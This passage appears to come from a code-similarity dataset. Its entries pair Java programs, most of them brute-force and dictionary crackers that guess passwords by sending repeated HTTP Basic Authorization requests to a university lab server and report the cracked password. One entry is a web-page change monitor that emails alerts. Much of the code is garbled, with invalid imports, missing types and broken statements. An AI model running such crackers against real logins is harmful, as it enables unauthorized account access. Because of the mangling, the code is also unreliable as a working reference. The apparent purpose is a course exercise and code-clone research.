\n String encoding = new userPassword.misc.BASE64Encoder().encode (userPassword.getBytes());\n\
\n URL url = new URL (urlString);\n\n HttpURLConnection uc = (HttpURLConnection)\
\ url.openConnection();\n\n uc.setRequestProperty (\"Authorization\", \"\
\ \" + encoding);\n\n url = uc.getResponseCode();\n\n\n }\n \
\ catch(MalformedURLException e){\n \t System.out.println(e);\n \
\ }catch(IOException e){\n System.out.println(e);\n }\n\n\n \
\ }\n}"
- "\n\n\n\npublic class HoldSharedData\n{\n private int numOfConnections\
\ = 0;\n private int startTime;\n private int totalTime = 0;\n \
\ private String[] password;\n private int pwdCount;\n\n public HoldSharedData(\
\ int time, String[] pwd, int count )\n {\n startTime = time;\n\n \
\ password = pwd;\n pwdCount = count;\n }\n\n public int getPwdCount()\n\
\ {\n return pwdCount;\n }\n\n public void setNumOfConnections(\
\ )\n {\n numOfConnections ++;\n }\n\n public int getNumOfConnections()\n\
\ {\n return numOfConnections;\n }\n\n public int getStartTime()\n\
\ {\n return startTime;\n }\n\n public void setTotalTime( int\
\ newTotalTime )\n {\n totalTime = newTotalTime;\n }\n\n public\
\ int getTotalTime()\n {\n return totalTime;\n }\n\n public String\
\ getPasswordAt( int index )\n {\n return password[index];\n }\n\
} \n"
- "\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\nimport java.io.*;\n\
import java.net.*;\n\n\n\npublic class Dictionary\n{\n private URL url;\n \
\ private HttpURLConnection connection ;\n private int stopTime = 0;\n private\
\ int startTime = 0;\n private int count = 0;\n\n public Dictionary()\n \
\ {\n System.out.println(\"Process is running...\");\n startTime = System.currentTimeMillis();\n\
\ findWords();\n }\n\n public static void main(String args[])\n {\n\
\ Dictionary sc = new Dictionary();\n }\n \n \n public void findWords()\n\
\ {\n try\n {\n BufferedReader input = new BufferedReader(new\
\ FileReader (\"words\"));\n String text;\n while ((text = input.readLine())\
\ != null)\n {\n if ((text.length() == 3) || (text.length()\
\ == 2))\n {\n count++;\n decision(text);\n\
\ }\n\n }\n\n }\n catch (IOException io)\n \
\ {\n System.out.println(\"File Error: \" + io.getMessage());\n }\n\
\ }\n \n \n public void decision(String s1)\n {\n if (find(s1)\
\ == 200)\n {\n stopTime = System.currentTimeMillis();\n \
\ runTime = stopTime - startTime;\n System.out.println(\"***************************************\"\
);\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\
\\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the\
\ Web site: \");\n displayContent(s1);\n System.out.println(\"\
\\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\
\\nNumber of attempts: \" + count);\n System.out.println();\n\n \
\ System.exit(0);\n }\n }\n \n \n public int find(String s1)\n\
\ {\n int responseCode = 0;\n try\n {\n url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\
\n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\
\" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n\
\ }catch (Exception e)\n {\n System.out.println(e.getMessage());\n\
\ }\n return responseCode;\n }\n \n public void displayContent(String\
\ pw)\n {\n BufferedReader bw = null ;\n try\n {\n url\
\ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection =\
\ (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"\
Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream\
\ stream = (InputStream)(connection.getContent());\n if (stream != null)\n\
\ {\n InputStreamReader reader = new InputStreamReader (stream);\n\
\ bw = new BufferedReader (reader);\n String line;\n\n\
\ while ((line = bw.readLine()) != null)\n {\n \
\ System.out.println(line);\n }\n }\n }\n \
\ catch (IOException e)\n {\n System.out.println(e.getMessage());\n\
\ }\n }\n}\n\n\n\n\n"
- source_sentence: "\nimport java.net.*;\nimport java.io.*;\nimport java.Ostermiller.util.*;\n\
import java.util.*;\n\npublic class MyClient1 implements Runnable\n{\n private\
\ String hostname;\n private int port;\n private String filename;\n private\
\ Socket s;\n private int n;\n private InputStream sin;\n private OutputStream\
\ sout;\n private int dif;\n private String myPassword;\n private int status;\n\
\ private int myTime;\n private Dictionary myMaster;\n \n\n public MyClient1(Dictionary\
\ dic, int num, int myPort, String password)\n {\n \n hostname = new\
\ String(\"sec-crack.cs.rmit.edu.\");\n port = myPort;\n status = 0;\n\
\ myTime = 0;\n myPassword = password;\n filename = new String(\"\
/SEC/2/\");\n myMaster = 0;\n n = num;\n dif = 0;\n \n }\n\
\ public getDif()\n {\n return dif;\n }\n public int getStatus()\n\
\ {\n return status;\n }\n public void run() \n {\n String inputLine;\n\
\ String[] tokens = new String[5];\n int i;\n myTime = 0;\n \
\ finish = 0;\n start = System.currentTimeMillis();\n try\n \
\ {\n s = new Socket( hostname, port);\n }catch( UnknownHostException\
\ e)\n {\n System.out.println(\"'t find host\");\n }catch( IOException\
\ e)\n {\n System.out.println(\"Error connecting host \"+n);\n\
\t return;\n }\n while(s.isConnected() == false)\n continue;\n\
\ \n finish = System.currentTimeMillis();\n dif = finish - start;\n\
\ \n try\n {\n sin = s.getInputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n BufferedReader fromServer = new BufferedReader(new InputStreamReader(\
\ ));\n try\n {\n sout = s.getOutputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n \n PrintWriter toServer = new PrintWriter( new OutputStreamWriter(\
\ sout));\n toServer.print(\"GET \"+filename+\" HTTP/1.0\\r\\n\"+\"Authorization:\
\ \"+Base64.encode(\"\"+\":\"+myPassword)+\"\\r\\n\\r\\n\");\n toServer.flush();\n\
\ \n try\n {\n inputLine = fromServer.readLine();\n \
\ }catch( IOException e)\n {\n System.out.println(\"'t open stream\"\
);\n\t inputLine = null;\n }\n \n java.util.StringTokenizer \
\ = new java.util.StringTokenizer( inputLine, \" \");\n i = 0;\n while(bf.hasMoreTokens())\n\
\ {\n tokens[i] =bf .nextToken();\n\t i++;\n }\n status\
\ = Integer.parseInt( tokens[1]);\n myTime = System.currentTimeMillis();\n\
\ if( status == 200)\n {\n System.out.println(\"Ok \"+myPassword);\n\
\t myMaster.retire( this);\n }\n \n toServer.send();\n try\n\
\ {\n fromServer.recieve();\n }catch( IOException e)\n \
\ {\n System.out.println(\"'t open stream\");\n }\n try\n\
\ {\n s.connect();\n }catch( IOException e)\n {\n \
\ System.out.println(\"'t connection\");\n\t System.exit(0);\n }\n\
\ }\n public getTime()\n {\n return myTime;\n }\n \n}\n"
sentences:
- "import java.net.*;\nimport java.io.*;\nimport java.*;\nimport java.Runtime.*;\n\
import java.Object.*;\nimport java.util.*;\nimport java.util.StringTokenizer;\n\
\n\npublic class ReadFile\n{\n private StringTokenizer tokenizer;\n private\
\ BufferedReader bf;\n private String line;\n private String first;\n Vector\
\ in = new Vector();\n \n public void loadFile()throws NoSuchElementException,\
\ IOException\n {\n System.out.println(\"in loadFile\");\n try{\n bf\
\ = new BufferedReader(new FileReader(\"words\"));\n }\n catch(FileNotFoundException\
\ fe){}\n catch(IOException io){}\n while((line = bf.readLine())!=null)\n\
\ {\n\n int index = 0;\n tokenizer = new StringTokenizer(line);\n\
\ try\n\t {\n\t first = tokenizer.nextToken();\n\t \n\t \n\
\t if (first.length() == 3)\n\t {\n\t\tin.add(first);\n\t }\n\t }\n\
\ catch(NoSuchElementException n)\n\t {\n System.out.println(\"\
File Loaded Succesfully\");\n\n }\n\n }\n }\n public Vector getVector()\n\
\ {\n return in;\n }\n public static void main (String args[])\n {\n\
\ Vector v = new Vector();\n try\n {\n System.out.println(\"\
in \");\n\t ReadFile rf = new ReadFile();\n rf.loadFile();\n v =\
\ rf.getVector();\n\t \n }\n catch(IOException e)\n {\n System.out.println(e);\n\
\ }\n System.out.println(\"size:\" + v.size());\n for (int i = 0;\
\ i< v.size(); i++)\n {\n System.out.println(i+1+ \":\" + v.elementAt(i));\n\
\ }\n \n \n }\n \n}\n"
- "\nimport java.net.*;\nimport java.io.*;\nimport java.Ostermiller.util.*;\nimport\
\ java.util.*;\n\npublic class MyClient2 implements Runnable\n{\n private String\
\ hostname;\n private int port;\n private String filename;\n private Socket\
\ s;\n private int n;\n private InputStream sin;\n private OutputStream\
\ sout;\n private int dif;\n private String myPassword;\n private int status;\n\
\ private int myTime;\n private BruteForce myMaster;\n \n\n public MyClient2(BruteForce\
\ bf , int num, int myPort, String password)\n {\n \n hostname = new\
\ String(\"sec-crack.cs.rmit.edu.\");\n port = myPort;\n status = 0;\n\
\ myTime = 0;\n myPassword = password;\n filename = new String(\"\
/SEC/2/\");\n myMaster = 0;\n n = num;\n dif = 0;\n \n }\n\
\ public getDif()\n {\n return dif;\n }\n public int getStatus()\n\
\ {\n return status;\n }\n public void run() \n {\n String inputLine;\n\
\ String[] tokens = new String[5];\n int i;\n myTime = 0;\n \
\ finish = 0;\n start = System.currentTimeMillis();\n try\n \
\ {\n s = new Socket( hostname, port);\n }catch( UnknownHostException\
\ e)\n {\n System.out.println(\"'t find host\");\n }catch( IOException\
\ e)\n {\n System.out.println(\"Error connecting host \"+n);\n\
\t return;\n }\n while(s.isConnected() == false)\n continue;\n\
\ \n finish = System.currentTimeMillis();\n dif = finish - start;\n\
\ \n try\n {\n sin = s.getInputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n BufferedReader fromServer = new BufferedReader(new InputStreamReader(\
\ ));\n try\n {\n sout = s.getOutputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n \n PrintWriter toServer = new PrintWriter( new OutputStreamWriter(\
\ sout));\n toServer.print(\"GET \"+filename+\" HTTP/1.0\\r\\n\"+\"Authorization:\
\ \"+Base64.encode(\"\"+\":\"+myPassword)+\"\\r\\n\\r\\n\");\n toServer.flush();\n\
\ \n try\n {\n inputLine = fromServer.readLine();\n \
\ }catch( IOException e)\n {\n System.out.println(\"'t open stream\"\
);\n\t inputLine = null;\n }\n \n java.util.StringTokenizer \
\ = new java.util.StringTokenizer( inputLine, \" \");\n i = 0;\n while(sin.hasMoreTokens())\n\
\ {\n tokens[i] = sin.nextToken();\n\t i++;\n }\n status\
\ = Integer.parseInt( tokens[1]);\n myTime = System.currentTimeMillis();\n\
\ if( status == 200)\n {\n System.out.println(\"Ok \"+myPassword);\n\
\t myMaster.retire( this);\n }\n \n toServer.send();\n try\n\
\ {\n fromServer.receive();\n }catch( IOException e)\n \
\ {\n System.out.println(\"'t open stream\");\n }\n try\n\
\ {\n s.connect();\n }catch( IOException e)\n {\n \
\ System.out.println(\"'t connection\");\n\t System.exit(0);\n }\n\
\ }\n public getTime()\n {\n return myTime;\n }\n \n}\n"
- "\n\nimport java.util.*;\nimport java.text.*;\nimport java.io.*;\nimport java.*;\n\
import java.net.*;\n\npublic class WatchDog\n{\n public static void main(String\
\ args[])\n {\n String s = null;\n String webpage = \"http://www.cs.rmit.edu./students/\"\
;\n \n \n String file1 = \"file1\";\n String file2 = \"file2\"\
;\n \n try\n {\n Process p = Runtime.getRuntime().exec(\"\
wget -O \" + file1 + \" \" + webpage);\n \n BufferedReader stdInput\
\ = new BufferedReader(new \n InputStreamReader(p.getInputStream()));\n\
\n BufferedReader stdError = new BufferedReader(new \n \
\ InputStreamReader(p.getErrorStream()));\n\n \n while ((s\
\ = stdInput.readLine()) != null) { \n System.out.println(s);\n \
\ }\n \n \n while ((s = stdError.readLine())\
\ != null) { \n System.out.println(s);\n }\n \n \
\ try\n {\n p.waitFor(); \n }\n catch\
\ (InterruptedException g) \n {\n } \n }\n catch (IOException\
\ e) {\n System.out.println(\"exception happened - here's what I know:\
\ \");\n e.printStackTrace();\n System.exit(-1);\n }\n \
\ \n while (true) \n {\n try\n {\n Process\
\ p = Runtime.getRuntime().exec(\"sleep 86400\"); \n \n \
\ BufferedReader stdInput = new BufferedReader(new \n InputStreamReader(p.getInputStream()));\n\
\n BufferedReader stdError = new BufferedReader(new \n \
\ InputStreamReader(p.getErrorStream()));\n\n \n while\
\ ((s = stdInput.readLine()) != null) { \n System.out.println(s);\n\
\ }\n \n \n while ((s = stdError.readLine())\
\ != null) { \n System.out.println(s);\n }\n \
\ \n try\n {\n p.waitFor(); \n \
\ }\n catch (InterruptedException g) \n {\n \
\ } \n }\n catch (IOException e) \n {\n System.out.println(\"\
exception happened - here's what I know: \");\n e.printStackTrace();\n\
\ System.exit(-1);\n } \n try \n {\n \
\ Process p = Runtime.getRuntime().exec(\"wget -O \" + file2 + \" \" + webpage);\n\
\ \n BufferedReader stdInput = new BufferedReader(new \n\
\ InputStreamReader(p.getInputStream()));\n\n BufferedReader\
\ stdError = new BufferedReader(new \n InputStreamReader(p.getErrorStream()));\n\
\n \n while ((s = stdInput.readLine()) != null) { \n \
\ System.out.println(s);\n }\n \n \
\ \n while ((s = stdError.readLine()) != null) { \n System.out.println(s);\n\
\ }\n \n try\n {\n p.waitFor();\
\ \n }\n catch (InterruptedException g) \n {\n\
\ } \n \n }\n catch (IOException e) \n \
\ {\n System.out.println(\"exception happened - here's what I\
\ know: \");\n e.printStackTrace();\n System.exit(-1);\n\
\ }\n try \n {\n \n Process p =\
\ Runtime.getRuntime().exec(\"diff \" + file1 + \" \" + file2);\n \n\
\ BufferedReader stdInput = new BufferedReader(new \n \
\ InputStreamReader(p.getInputStream()));\n\n BufferedReader stdError\
\ = new BufferedReader(new \n InputStreamReader(p.getErrorStream()));\
\ \n \n \n while ((s = stdError.readLine())\
\ != null) { \n System.out.println(s);\n }\n \
\ \n try\n {\n p.waitFor(); \n \
\ }\n catch (InterruptedException g) \n {\n \
\ }\n \n if ((p.exitValue()) == 1) \n { \n \
\ \n String mailServerURL = \"yallara.cs.rmit.edu.\";\n\
\ String host = \"yallara.cs.rmit.edu.\";\n String\
\ from = \"@yallara.cs.rmit.edu.\";\n \n String subject\
\ = \"Change Detected In WatchDog.java\";\n \n try\n \
\ {\n \t\n Socket csoc=new Socket(mailServerURL,25);\n\
\ BufferedReader in=new BufferedReader(\n \
\ new InputStreamReader(csoc.getInputStream()));\n \n\
\ PrintWriter out=new PrintWriter(csoc.getOutputStream(),true);\n\
\ System.out.println(\"HELO \"+host);\n System.out.println(in.readLine());\n\
\ out.println(\"MAIL FROM:\"+from);\n System.out.println(in.readLine());\n\
\ System.out.println(in.readLine());\n System.out.println(\"\
DATA\");\n System.out.println(in.readLine());\n \
\ System.out.println(\"SUBJECT:\"+subject);\n System.out.println(in.readLine());\n\
\ \n \n while ((s = stdInput.readLine())\
\ != null){\n System.out.println(s);\n }\n\
\ out.println(\".\");\n System.out.println(in.readLine());\n\
\ System.out.println(\"QUIT\");\n System.out.println(in.readLine());\
\ \n }\n catch(Exception e)\n \
\ {\n e.printStackTrace();\n System.out.println(\"\
Some error occoured while communicating server\");\n }\n \
\ } \n }\n catch (IOException e) \n {\n \
\ System.out.println(\"exception happened - here's what I know: \");\n\
\ e.printStackTrace();\n System.exit(-1);\n }\n\
\ } \n }\n}"
- source_sentence: "\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\nimport\
\ java.util.*;\n\npublic class Dictionary {\n public static void main (String[]\
\ args) throws IOException {\n BufferedReader stdin = new BufferedReader (new\
\ InputStreamReader(System.in));\n\n d = new Date().getTime();\n \
\ FileReader fr = new FileReader(\"/usr/share/lib/dict/words\");\n BufferedReader\
\ bufr = new BufferedReader(fr);\n String word = bufr.readLine(); \
\ \n int total = 960;\n String[] pws = new String[total];\n\
\ int count = 0;\n while (word!=null){\n if (word.length()<=3)\
\ { pws[count] = word; count++;}\n\tword = bufr.readLine();\n }\n \
\ \n int i=0;\n int response = 0;\n for (i=0;i<count;i++){\n\
\ String uname = \"\";\n String userinfo = uname + \":\" + pws[i];\n\
\ try{\n String encoding = new bf.misc.BASE64Encoder().encode (userinfo.getBytes());\n\
\ URL url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n \
\ HttpURLConnection uc = (HttpURLConnection)url.openConnection();\n \
\ uc.setRequestProperty (\"Authorization\", \" \" + encoding);\n response\
\ = uc.getResponseCode();\n\t if (response == 200) break;\n\t else uc.disconnect();\n\
\ }\n catch(IOException e){ System.err.println(e); e.printStackTrace();\
\ } \n catch(IllegalStateException s){ System.err.println(s); s.printStackTrace();\
\ }\n }\n System.out.println(\"Response \"+i+\" was \"+response);\n\
\ System.out.println(\"The successful password was \"+pws[i]);\n \
\ finish = new Date().getTime();\n float totaltime = (float)(finish-d)/1000;\n\
\ System.out.println(\"Time taken: \"+totaltime+ \" seconds.\");\n \
\ \n }\n}\n\n"
sentences:
- "\nimport java.net.*;\nimport java.io.*;\nimport java.util.*;\n\n\npublic class\
\ Dictionary {\n\n public static void main(String args[])\n {\n int i,j,k;\n\
\ String pass = new String();\n String UserPass = new String();\n String status\
\ = new String();\n String status1 = new String();\n BasicAuth auth = new BasicAuth();\n\
\ URLConnection connect;\n int start,end,diff;\n try {\n URL\
\ url = new URL (\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n\n\n\n \
\ start =System.currentTimeMillis();\n\n BufferedReader dis =\
\ new BufferedReader(new FileReader(\"words\"));\n\n\n while ((pass =\
\ dis.readLine()) != null)\n {\n\n\n UserPass= auth.encode(\"\
\",pass);\n\n connect = url.openConnection();\n connect.setDoInput(true);\n\
\ connect.setDoOutput(true);\n\n connect.setRequestProperty(\"\
Host\",\"sec-crack.cs.rmit.edu.\");\n connect.setRequestProperty(\"\
Get\",\"/SEC/2/ HTTP/1.1\");\n connect.setRequestProperty(\"Authorization\"\
,\" \" + UserPass);\n connect.connect();\n status =connect.getHeaderField(0);\n\
\ status1 = status.substring( 9,12);\n if (status.equalsIgnoreCase(\"\
HTTP/1.1 200 OK\"))\n {\n System.out.println(\"Password\
\ is \" + pass);\n end=System.currentTimeMillis();\n \
\ diff = end - start;\n System.out.println(\"Time Taken = \" + (diff/1000)\
\ + \" secs\");\n System.exit(0);\n }\n \
\ ((HttpURLConnection)connect).disconnect();\n connect = null;\n\
\ }\n\n System.out.println(\" match found\");\n\n \
\ dis.close();\n dis=null;\n\n connect = null;\n\n\
\ }\n\n catch (MalformedURLException malerr)\n {\n System.err.println(\"\
Unable Open URL\" + malerr);\n }\n\n catch (Exception ioerr)\n {\n System.err.println(\"\
Unable open file\" + ioerr);\n }\n\n\n\n\n }\n}"
- "import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public class Dictionary\
\ {\n\n URLConnection conn = null;\n private static boolean status = false;\n\
\n public static void main (String args[]){\n Dictionary a = new Dictionary();\n\
\ String[] inp = {\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\",\n \
\ \t\t\t\t \"\",\n \t\t\t\t \"\"};\n File file = new File(\"words\");\n\
\ exit:\n try {\n\t\t BufferedReader in = new BufferedReader(new FileReader(file));\n\
\t\t int attempt = 0;\n\t\t inp[2] = in.readLine();\n\t\t while (inp[2] != null)\
\ {\n\t\n\t\t\t if (inp[2].length() <= 3) {\n\t\t\t \tattempt++;\n\t\t\t \ta.doit(inp);\n\
\ \t\t \tif (status) {\n\t\t\t \t\t System.out.println(\"Crrect password is:\
\ \" + inp[2]);\n\t\t\t \t\t System.out.println(\"Number of attempts = \" + attempt);\n\
\t\t\t \t\t break exit;\n\t\t\t \t}\n\t\t \t }\n\t\t\t inp[2] = in.readLine();\n\
\ \t\t}\n\t } catch (FileNotFoundException e1) {\n\t\t \n\t\tSystem.err.println(\"\
File not found: \" + file);\n\t} catch (IOException e2) {\n\t\t\n\t\te2.printStackTrace();\n\
\t}\n\n }\n\n public void doit(String args[]) {\n \n try {\n \
\ BufferedReader in = new BufferedReader(\n new InputStreamReader\n\
\ (connectURL(new URL(args[0]), args[1], args[2])));\n String\
\ line;\n while ((line = in.readLine()) != null) {\n System.out.println(line);\n\
\ status = true;\n }\n }\n catch (IOException e)\
\ {\n \n }\n }\n\n public InputStream connectURL (URL url, String\
\ uname, String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setRequestProperty (\"Authorization\",\n userNamePasswordBase64(uname,pword));\n\
\ conn.connect ();\n return conn.getInputStream();\n }\n\n public\
\ String userNamePasswordBase64(String username, String password) {\n return\
\ \" \" + base64Encode (username + \":\" + password);\n }\n\n private final\
\ static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n\
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n '4', '5', '6',\
\ '7', '8', '9', '+', '/'\n };\n\n private static String base64Encode (String\
\ string) {\n String encodedString = \"\";\n byte bytes [] = string.getBytes\
\ ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n \
\ byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i\
\ >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length)\
\ {\n b3 = 0;\n pad = 1;\n }\n else\n\
\ b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n\
\ byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2\
\ & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n switch\
\ (pad) {\n case 0:\n encodedString += base64Array [c3];\n \
\ encodedString += base64Array [c4];\n break;\n case 1:\n\
\ encodedString += base64Array [c3];\n encodedString += \"=\"\
;\n break;\n case 2:\n encodedString += \"==\";\n \
\ break;\n }\n }\n return encodedString;\n }\n }\n\n"
- "\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\nimport java.util.*;\n\
\npublic class BruteForce {\n public static void main (String[] args) throws IOException\
\ {\n BufferedReader stdin = new BufferedReader (new InputStreamReader(System.in));\n\
\n int start = new Date().getTime();\n String[] letters = {\"a\",\"\
A\",\"b\",\"B\",\"c\",\"C\",\"d\",\"D\",\"e\",\"E\",\"f\",\"F\",\"g\",\"G\",\n\
\ \"h\",\"H\",\"i\",\"I\",\"j\",\"J\",\"k\",\"K\",\"\
l\",\"L\",\"m\",\"M\",\"n\",\"N\",\n\t\t\t \"o\",\"O\",\"p\",\"P\",\"q\",\"Q\"\
,\"r\",\"R\",\"s\",\"S\",\"t\",\"T\",\"u\",\"U\",\n\t\t\t \"v\",\"V\",\"w\",\"\
W\",\"x\",\"X\",\"y\",\"Y\",\"z\",\"Z\"};\n int len = 52;\n int total\
\ = 52;\n String[] cad = new String[total];\n int t=0;\n \n \
\ for (int i=0;i<=len-1;i++){\n\t cad[t] = letters[i];\n\t t++;\n } \n\
\ for (int i=0;i<=len-1;i++){\n for (int j=0;j<=len-1;j++){\n\t \
\ cad[t] = letters[j]+letters[i];\n\t t++;\n }}\n for (int i=0;i<=len-1;i++){\n\
\ for (int j=0;j<=len-1;j++){\n for (int k=0;k<=len-1;k++){\n\t \
\ cad[t] = letters[k]+letters[j]+letters[i];\n\t t++;\n }}}\n \
\ \n int response = 0;\n for (t=0;t<=total-1;t++){\n String\
\ uname = \"\";\n String userinfo = uname + \":\" + cad[t];\n try{\n\
\ String encoding = new url.misc.BASE64Encoder().encode (userinfo.getBytes());\n\
\ URL url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n \
\ HttpURLConnection uc = (HttpURLConnection)url.openConnection();\n \
\ uc.setRequestProperty (\"Authorization\", \" \" + encoding);\n response\
\ = uc.getResponseCode();\n\t if (response == 200) break;\n\t else uc.disconnect();\n\
\ }\n catch(IOException e){ System.err.println(e); e.printStackTrace();\
\ } \n catch(IllegalStateException s){ System.err.println(s); s.printStackTrace();\
\ }\n }\n System.out.println(\"Response \"+t+\" was \"+response);\n\
\ System.out.println(\"The successful password was \"+cad[t]);\n \
\ finish = new Date().getTime();\n float totaltime = (float)(finish-start)/1000;\n\
\ System.out.println(\"Total time: \"+totaltime+\" seconds\");\n }\n}\n\
\n"
- source_sentence: "import java.net.*;\nimport java.io.*;\n\npublic class BruteForce\
\ {\n private String strUserName;\n private String strURL;\n private int iAttempts;\n\
\ \n public BruteForce(String strURL,String strUserName) {\n this.strURL\
\ = strURL;\n this.strUserName = strUserName;\n this.iAttempts = 0 ;\n\n\
\ }\n \n public String getPassword(){\n URL u;\n String result =\"\
\";\n PassGenBrute PG = new PassGenBrute(3);\n URLConnection uc;\n \
\ String strPassword = new String();\n String strEncode;\n try{\n\
\ while (result.compareTo(\"HTTP/1.1 200 OK\")!=0){\n \n \
\ strEncode = PG.getNewPassword();\n u = new URL(strURL);\n \
\ uc = u.openConnection();\n uc.setDoInput(true);\n uc.setDoOutput(true);\n\
\ strPassword = strEncode;\n strEncode = strUserName + \":\"\
\ + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n\
\ uc.setRequestProperty(\"Authorization\",\" \" + strEncode);\n \
\ \n result = uc.getHeaderField(0);\n uc = null;\n \
\ u = null;\n iAttempts++;\n }\n\n }\n catch (Exception\
\ me) {\n System.out.println(\"MalformedURLException: \"+me);\n }\n\
\ return(strPassword);\n }\n \n public int getAttempts(){\n return\
\ (iAttempts);\n };\n \n public static void main (String arg[]){\n timeStart\
\ = 0;\n timeEnd = 0;\n \n if (arg.length == 2) {\n BruteForce\
\ BF = new BruteForce(arg[0],arg[1]);\n System.out.println(\"Processing\
\ ... \");\n timeStart = System.currentTimeMillis();\n \n System.out.println(\"\
Password = \" + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n\
\ System.out.println(\"Total Time Taken = \" + (timeEnd - timeStart) + \"\
\ (msec)\");\n System.out.println(\"Total Attempts = \" + BF.getAttempts());\n\
\ }\n else {\n System.out.println(\"[Usage] java BruteForce <URL>\
\ <USERNAME>\");\n\n }\n\n }\n}\n\nclass PassGenBrute {\n private char[]\
\ password;\n public PassGenBrute(int lenght) {\n password = new char[lenght];\n\
\ for (int i = 0; i < lenght; i++){\n password[i] = 65;\n }\n password[0]--;\n\
\ }\n \n public String getNewPassword()\n throws PasswordFailureException{\n\
\ password[0]++;\n\n try {\n for (int i=0; i<password.length ; i++){\n\
\ if (password[i] == 90) {\n password[i] = 97;\n }\n \
\ if (password[i] > 122) {\n password[i] = 65;\n password[i+1]++;\n\
\ }\n }\n }\n catch (RuntimeException re){\n throw new\
\ PasswordFailureException ();\n }\n return new String(password);\n }\n\
}\n\nclass PasswordFailureException extends RuntimeException {\n\n public PasswordFailureException()\
\ {\n }\n}"
sentences:
- "import java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary {\n private\
\ String strUserName;\n private String strURL;\n private String strDictPath;\n\
\ private int iAttempts;\n\n \n public Dictionary(String strURL,String\
\ strUserName,String strDictPath) {\n this.strURL = strURL;\n this.strUserName\
\ = strUserName;\n this.iAttempts = 0 ;\n this.strDictPath = strDictPath;\n\
\ }\n \n\n public String getPassword(){\n URL u;\n String result\
\ =\"\";\n PassGenDict PG = new PassGenDict(3,strDictPath);\n URLConnection\
\ uc;\n String strPassword = new String();\n String strEncode;\n \
\ try{\n while (result.compareTo(\"HTTP/1.1 200 OK\")!=0){\n \n\
\ strEncode = PG.getNewPassword();\n u = new URL(strURL);\n\
\ uc = u.openConnection();\n uc.setDoInput(true);\n \
\ uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode\
\ = strUserName + \":\" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n\
\ uc.setRequestProperty(\"Authorization\",\" \" + strEncode);\n \
\ \n result = uc.getHeaderField(0);\n uc = null;\n \
\ u = null;\n iAttempts++;\n }\n\n }\n catch (Exception\
\ me) {\n System.out.println(\"MalformedURLException: \"+me);\n }\n\
\ return(strPassword);\n }\n \n public int getAttempts(){\n return\
\ (iAttempts);\n };\n \n public static void main(String arg[]){\n timeStart\
\ = 0;\n timeEnd = 0;\n \n if (arg.length == 3) {\n Dictionary BF\
\ = new Dictionary(arg[0],arg[1],arg[2]);\n\n System.out.println(\"Processing\
\ ... \");\n timeStart = System.currentTimeMillis();\n System.out.println(\"\
Password = \" + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n\
\ System.out.println(\"Total Time Taken = \" + (timeEnd - timeStart) + \" (msec)\"\
);\n System.out.println(\"Total Attempts = \" + BF.getAttempts());\n }\n\
\ else {\n System.out.println(\"[Usage] java BruteForce <URL> <USERNAME>\
\ <Dictionary path>\");\n\n }\n\n }\n}\n\n\nclass PassGenDict {\n\n private\
\ char[] password;\n private String line;\n int iPassLenght;\n private BufferedReader\
\ inputFile;\n public PassGenDict(int lenght, String strDictPath) {\n try{\n\
\ inputFile = new BufferedReader(new FileReader(strDictPath));\n }\n \
\ catch (Exception e){\n }\n iPassLenght = lenght;\n }\n \n public\
\ String getNewPassword()\n throws PasswordFailureException{\n try {\n \
\ {\n line = inputFile.readLine();\n }while (line.length() !=\
\ iPassLenght);\n\n }\n catch (Exception e){\n throw new PasswordFailureException\
\ ();\n }\n return (line);\n }\n}\n\nclass PasswordFailureException extends\
\ RuntimeException {\n\n public PasswordFailureException() {\n }\n}"
- "\n\n\n\n\nimport java.io.IOException;\nimport java.net.*;\n\nimport java.io.*;\n\
import java.util.*;\n\n\n\npublic class Dictionary\n\n{\n\n\n static URL url\
\ = null;\n static URLConnection urlConnection;\n static InputStream urlStream;\n\
